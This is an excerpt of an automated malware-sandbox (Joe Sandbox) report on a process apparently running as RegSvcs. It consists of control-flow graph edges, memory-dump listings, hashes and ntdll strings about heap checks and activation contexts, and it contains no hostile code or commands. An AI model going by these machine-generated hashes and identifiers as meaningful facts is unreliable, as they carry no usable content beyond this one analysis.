13da6b1-13da6b5 394->410 401 1427ad6 396->401 402 13da452-13da454 396->402 399 1427a3a-1427a42 397->399 400 13da4e2-13da4e5 397->400 404 13da634-13da64a 399->404 405 1427a48-1427a4c 399->405 400->404 406 13da4eb-13da4ee 400->406 401->375 407 13da45a-13da461 402->407 408 13da520-13da539 call 13da6e0 402->408 411 13da4f4-13da50c 404->411 412 13da650-13da659 404->412 405->404 413 1427a52-1427a5b 405->413 406->396 406->411 414 13da57b-13da582 407->414 415 13da467-13da46c 407->415 422 13da53f-13da567 408->422 423 13da65e-13da665 408->423 410->386 411->396 421 13da512-13da51b 411->421 412->402 419 1427a85-1427a87 413->419 420 1427a5d-1427a60 413->420 414->377 418 13da588 414->418 415->329 416 13da46e 415->416 416->329 418->375 419->404 424 1427a8d-1427a96 419->424 425 1427a62-1427a6c 420->425 426 1427a6e-1427a71 420->426 421->402 427 13da569-13da56b 422->427 423->427 428 13da66b-13da66e 423->428 424->402 429 1427a81 425->429 430 1427a73-1427a7c 426->430 431 1427a7e 426->431 427->415 432 13da571-13da573 427->432 428->427 433 13da674-13da67c 428->433 429->419 430->424 431->429 434 13da579 432->434 435 1427a9b-1427aa4 432->435 433->392 434->414 435->434 436 1427aaa-1427ab0 435->436 436->434 437 1427ab6-1427abe 436->437 437->434 438 1427ac4-1427acf 437->438 438->437 439 1427ad1 438->439 439->434
                                                              Strings
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014279FA
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014279D5
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 014279D0, 014279F5
                                                              • SsHd, xrefs: 013DA3E4
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                              • API String ID: 0-929470617
                                                              • Opcode ID: 6492af3284cc981f3765e30cec11571edbaa72f2a8bf508da9f2470e170ebd50
                                                              • Instruction ID: 52f34876b97cd6e1bed6c1b5f15f571f5275a072bb049b7851ac6e9a7ea6f9d0
                                                              • Opcode Fuzzy Hash: 6492af3284cc981f3765e30cec11571edbaa72f2a8bf508da9f2470e170ebd50
                                                              • Instruction Fuzzy Hash: 71E1F572604301CFE725CE2CD684B2BBBE5BB84228F544A2EF995CB391D731D985CB81

                                                              Control-flow Graph

                                                              Strings
                                                              • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0142936B
                                                              • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01429346
                                                              • RtlpFindActivationContextSection_CheckParameters, xrefs: 01429341, 01429366
                                                              • GsHd, xrefs: 013DD874
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                              • API String ID: 3446177414-576511823
                                                              • Opcode ID: 6c1ef91602b727c5c3aba7b71f0fef446d089d4af9c1ce3365f60d9702f143e5
                                                              • Instruction ID: bb76f02e8be70a880a37f9a7ea3869e72764814b7e262fbe9bc8c7388ddf04fe
                                                              • Opcode Fuzzy Hash: 6c1ef91602b727c5c3aba7b71f0fef446d089d4af9c1ce3365f60d9702f143e5
                                                              • Instruction Fuzzy Hash: 1AE1C3726083528FDB21CF58D480B6BBBE5BF4831CF444A6EE9958B391D771E984CB42
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                              • Instruction ID: bf3a9544959f8e46695f379e45b07e42938a691d98b4a78b1f7fa165ded2c53e
                                                              • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                              • Instruction Fuzzy Hash: B681C238E012498EEF2B8E6EC8507BE7BB1EF95310F18453BD851A73F1C63489418B59
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$@
                                                              • API String ID: 3446177414-1194432280
                                                              • Opcode ID: 6016a1390820768e0b32c419ef5a4edc08fb70d0c936f1fb39891bc672f6f488
                                                              • Instruction ID: f7c1838f3a699836aeeeb315a002529005520859321a142c3b2ff635a95d96d3
                                                              • Opcode Fuzzy Hash: 6016a1390820768e0b32c419ef5a4edc08fb70d0c936f1fb39891bc672f6f488
                                                              • Instruction Fuzzy Hash: E1811B72D002699BDB35CB54CC45BEABBB8AB48714F0141EAEA19B7290D7705E85CFA0
                                                              APIs
                                                              • RtlDebugPrintTimes.NTDLL ref: 013ED959
                                                                • Part of subcall function 013C4859: RtlDebugPrintTimes.NTDLL ref: 013C48F7
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $$$$p/$*
                                                              • API String ID: 3446177414-332567944
                                                              • Opcode ID: 71ea46af60c30043f6bfddf1f1d91a214f454f3c862dac5a91ef35e45fd35b6b
                                                              • Instruction ID: a28dd4751a52192f403739799838c0b08b73f6380f85ec6c61decd4ff7c5c8e3
                                                              • Opcode Fuzzy Hash: 71ea46af60c30043f6bfddf1f1d91a214f454f3c862dac5a91ef35e45fd35b6b
                                                              • Instruction Fuzzy Hash: 7F510171A0035A9FDB24DFA8D88879EBFF1BF44308F144119D9056B2E1C770A882CB90
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: 0Ivw$0Ivw$0Ivw$X
                                                              • API String ID: 3446177414-3775388739
                                                              • Opcode ID: 9d56f9629920bd1570f474d1e05fbf1a8e49a60a0d4f9b716a364496dfa13431
                                                              • Instruction ID: 817b734881c72a8521064f63ff4f8330f044f0b1edfef3001f8d649d480a4e9e
                                                              • Opcode Fuzzy Hash: 9d56f9629920bd1570f474d1e05fbf1a8e49a60a0d4f9b716a364496dfa13431
                                                              • Instruction Fuzzy Hash: 9231D87190120AEBDF63DF6AD880B8E3B71AB49348F08402EFF04562B1D3748A90DF95
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
                                                              • API String ID: 3446177414-56086060
                                                              • Opcode ID: 7df63c0d0f57e71e78d87445495001a11a0b21da7146cc7e3ad49ddd37dbb85f
                                                              • Instruction ID: 868ea1a8c316f31e69991e68f57bfcb0e1611fb632ff39910a2828637f95f834
                                                              • Opcode Fuzzy Hash: 7df63c0d0f57e71e78d87445495001a11a0b21da7146cc7e3ad49ddd37dbb85f
                                                              • Instruction Fuzzy Hash: 91412330A10766DFDB22DB68C488BAAB7F4EF40728F54416AD50547BE1DB74A8C5CB90
                                                              Strings
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01444899
                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01444888
                                                              • LdrpCheckRedirection, xrefs: 0144488F
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 3446177414-3154609507
                                                              • Opcode ID: a37d256fe56009834a9274d51b6f2d9bbc0bd3242952dd10eb8695c5e17ac180
                                                              • Instruction ID: b0b33e52d8f0e66ef4cded7ccab6e0fc4fa2893cfaf270fa4ffa668f96148f89
                                                              • Opcode Fuzzy Hash: a37d256fe56009834a9274d51b6f2d9bbc0bd3242952dd10eb8695c5e17ac180
                                                              • Instruction Fuzzy Hash: 2741D136A006519BFB21CE29D841B27BBE4AF49A50B09055FED48E7372E730D801CB91
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
                                                              • API String ID: 3446177414-3526935505
                                                              • Opcode ID: 47fd089888dc15dfa9cb4d73d87e177c51fe408e5288770fd70fa78e0b5f404f
                                                              • Instruction ID: 81425e47137d9d9a9b1cc993c77b4bbc1d9dcd652c9783f9858ebb2addce1a7f
                                                              • Opcode Fuzzy Hash: 47fd089888dc15dfa9cb4d73d87e177c51fe408e5288770fd70fa78e0b5f404f
                                                              • Instruction Fuzzy Hash: 05312931114794DFEB26DB6DC449BAAB7F8EF01B58F44405AE44287BA2CBB4A8C4C751
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $
                                                              • API String ID: 3446177414-3993045852
                                                              • Opcode ID: 05150c7c6ddf70d92a0298c4c9e30761806a44b9a8bdf2bdcc2f5ff85d070153
                                                              • Instruction ID: a46094497d91890486df6f439fda77b20190e1d09fdde0d86236bbbdf2806d43
                                                              • Opcode Fuzzy Hash: 05150c7c6ddf70d92a0298c4c9e30761806a44b9a8bdf2bdcc2f5ff85d070153
                                                              • Instruction Fuzzy Hash: 5711A172A00219EFDF15AF94E848A9D7B71FF44320F10891AF92A672F4CB315A00CF40
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3cd67b15da0a6f78da7174f4b596c5178b3aec1046606e4cb47602dbcdf58f9c
                                                              • Instruction ID: f1d6226c3d80c73dfb90ea26747d5ee03bec8407f681692dfd5aeace068841a6
                                                              • Opcode Fuzzy Hash: 3cd67b15da0a6f78da7174f4b596c5178b3aec1046606e4cb47602dbcdf58f9c
                                                              • Instruction Fuzzy Hash: A9E11275D00728CFCB25CFA9D988A9DBBF9BF48308F24452AE546A72A1D770A941CF10
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: 56561f768ea42a90f5e02425c762e68c2b9d4d82cbca678b803f855d3fb280dd
                                                              • Instruction ID: 8a3f9bb64699514204814b377fa873457e764ae55b67a45f350345ca5a1aac8b
                                                              • Opcode Fuzzy Hash: 56561f768ea42a90f5e02425c762e68c2b9d4d82cbca678b803f855d3fb280dd
                                                              • Instruction Fuzzy Hash: 67713671E0021AAFDF05CFA8D984ADDBBB5BF88314F14402AEA05FB264D734A909CF51
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID:
                                                              • API String ID: 3446177414-0
                                                              • Opcode ID: f2698cdf9805bdd93fe869ed8bf447b10f21b5cbc39b14d47dc6569b0a670558
                                                              • Instruction ID: 35cf2de0170d32acfced2a53e3a8d33ed316824f4ab8b3a04621a4934fe18f86
                                                              • Opcode Fuzzy Hash: f2698cdf9805bdd93fe869ed8bf447b10f21b5cbc39b14d47dc6569b0a670558
                                                              • Instruction Fuzzy Hash: 55514675E00219DFEF08CF98D8446DDBBB5BF88314F14802AE915BB260D7349909CF55
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                              • String ID:
                                                              • API String ID: 4281723722-0
                                                              • Opcode ID: b55d6f0d95fd2f29fe5c9185b731b972e74588766c135d8836338b1dee0b7e42
                                                              • Instruction ID: e2221ab2c373acf0c98517bcaa60d5e8ca5c843901de0b853c2db525b2c79d23
                                                              • Opcode Fuzzy Hash: b55d6f0d95fd2f29fe5c9185b731b972e74588766c135d8836338b1dee0b7e42
                                                              • Instruction Fuzzy Hash: C1312371E00619AFCF21EFA9E884A9EBBF0FB58720F24412AE511B73A4CB355901CF54
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @
                                                              • API String ID: 0-2766056989
                                                              • Opcode ID: 5b3ff599d914bcb2e2671d7fa70aa094268a0aaa6ccc2f8d52a93d296b046179
                                                              • Instruction ID: 7669140cacee43de49f3e5733feee13b9abe0ea2624f217bd2d0636c0d453975
                                                              • Opcode Fuzzy Hash: 5b3ff599d914bcb2e2671d7fa70aa094268a0aaa6ccc2f8d52a93d296b046179
                                                              • Instruction Fuzzy Hash: 09324870E0426ADFDB25CF68C884BE9BBB4BB18708F0081EED549A7651D7746E84CF91
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                              • Instruction ID: aeedf965bfa74229ea473a4f71cae366d193c0645b771589983cbcd5cb05b547
                                                              • Opcode Fuzzy Hash: d84d73e5c23e50fb3757e9c39722a22be4762bc4311d32b0c95698253cae6a4f
                                                              • Instruction Fuzzy Hash: F291C470E002069ADB26DF6FC8906BFBBA5AF44322F14453FE995A73E0D730AD418752
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: Bl$l
                                                              • API String ID: 3446177414-208461968
                                                              • Opcode ID: 8fe3e63ecb4fc86332d29b1c1e42e53ceef4bbd2498e3312a7008199733973d2
                                                              • Instruction ID: 6aed121a8accbb512815c65d6b84c3919190e2c89cce86572c608ffd5bae1c84
                                                              • Opcode Fuzzy Hash: 8fe3e63ecb4fc86332d29b1c1e42e53ceef4bbd2498e3312a7008199733973d2
                                                              • Instruction Fuzzy Hash: FDA1D572B003298BEF31DB99D890BAEB7B5BB44308F0540EDD90967291CB74AE85CF51
                                                              APIs
                                                              • __startOneArgErrorHandling.LIBCMT ref: 01405E34
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: ErrorHandling__start
                                                              • String ID: pow
                                                              • API String ID: 3213639722-2276729525
                                                              • Opcode ID: 1b8393d05116431a7e6f0952bf97f52b5a1e50c06c254e5734058114392d0c01
                                                              • Instruction ID: 00b927a9c87addf61aa1974cd8d3e1404196564c3382ae233df911a40e3f51dd
                                                              • Opcode Fuzzy Hash: 1b8393d05116431a7e6f0952bf97f52b5a1e50c06c254e5734058114392d0c01
                                                              • Instruction Fuzzy Hash: 2D516B7490820697D713B71FC90136B2B94EB50760F14C97FE4E68E3F9DA3488968F8A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$Flst
                                                              • API String ID: 0-758220159
                                                              • Opcode ID: 796587dff25c44063977e7f70657da72e7ed0e30c0cfe46304ebe536a84a0c1b
                                                              • Instruction ID: 75bf2418410fc10d793a7e9ecf6958179e8c3f3c51222f02deb2a495a32f98ba
                                                              • Opcode Fuzzy Hash: 796587dff25c44063977e7f70657da72e7ed0e30c0cfe46304ebe536a84a0c1b
                                                              • Instruction Fuzzy Hash: 18517FB1E002598FDF26CF99C58466EFBF4FF44718F15802EE2499B2A6E7709945CB80
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_21_2_1390000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DebugPrintTimes
                                                              • String ID: $
                                                              • API String ID: 3446177414-3993045852
                                                              • Opcode ID: 1055712d76a82b28827bdac390eb7e4f59e4c445e2d557848f5597855c09ea55
                                                              • Instruction ID: 4a371b29574eef4d55c9f1455ff978c5c09aa2f99949dbefb82e3591f1490f5f
                                                              • Opcode Fuzzy Hash: 1055712d76a82b28827bdac390eb7e4f59e4c445e2d557848f5597855c09ea55
                                                              • Instruction Fuzzy Hash: E3419CB5E00209ABDF11DF99C885AEFBBB5FF88B14F14001AEE11A7361D7719915CBA0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000015.00000002.1651072866.00000000013B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                              • Associated: 00000015.00000002.1651072866.0000000001390000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001397000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001410000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001416000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.0000000001452000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B3000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000015.00000002.1651072866.00000000014B9000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
